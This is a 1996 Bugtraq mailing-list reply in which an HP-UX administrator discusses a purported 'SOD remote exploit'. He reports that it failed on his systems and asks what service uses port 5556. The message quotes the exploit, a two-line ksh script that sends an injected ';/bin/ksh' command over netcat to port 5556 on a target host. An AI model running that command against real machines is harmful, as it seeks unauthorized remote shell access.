[3456] in bugtraq
Re: BoS: SOD remote exploit
daemon@ATHENA.MIT.EDU (Erik Fichtner)
Mon Oct 14 15:06:28 1996
Date: Mon, 14 Oct 1996 13:43:43 -0400
Reply-To: Erik Fichtner <emf@pls.com>
From: Erik Fichtner <emf@pls.com>
X-To: Julian Assange <proff@suburbia.net>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
Julian Assange wrote:
>
> #!/bin/ksh
> echo ' 11T ;/bin/ksh' | nc $1 5556
> # Yup, that's it. That's the hole.. Believe it.
>
> HP-UX 10.0,
> haven't tested it personally.
>
I tried this a couple weeks ago when the SOD folks started publicizing
their web page and supposed exploits..
it didnt work.. theres no deamon listening on that port on any of our
9 or 10 hpux systems. So, it's nothing that a default install by a
HPUX-clueless admin such as myself installs.
Anyone know what this port 5556 belongs to? /etc/services doesnt
have an entry for it.
be nice to know what this belonged to so it doesnt accidentally get
installed.
--
Erik Fichtner Systems Administrator, PLS emf@pls.com
'Your agonizer, please...'
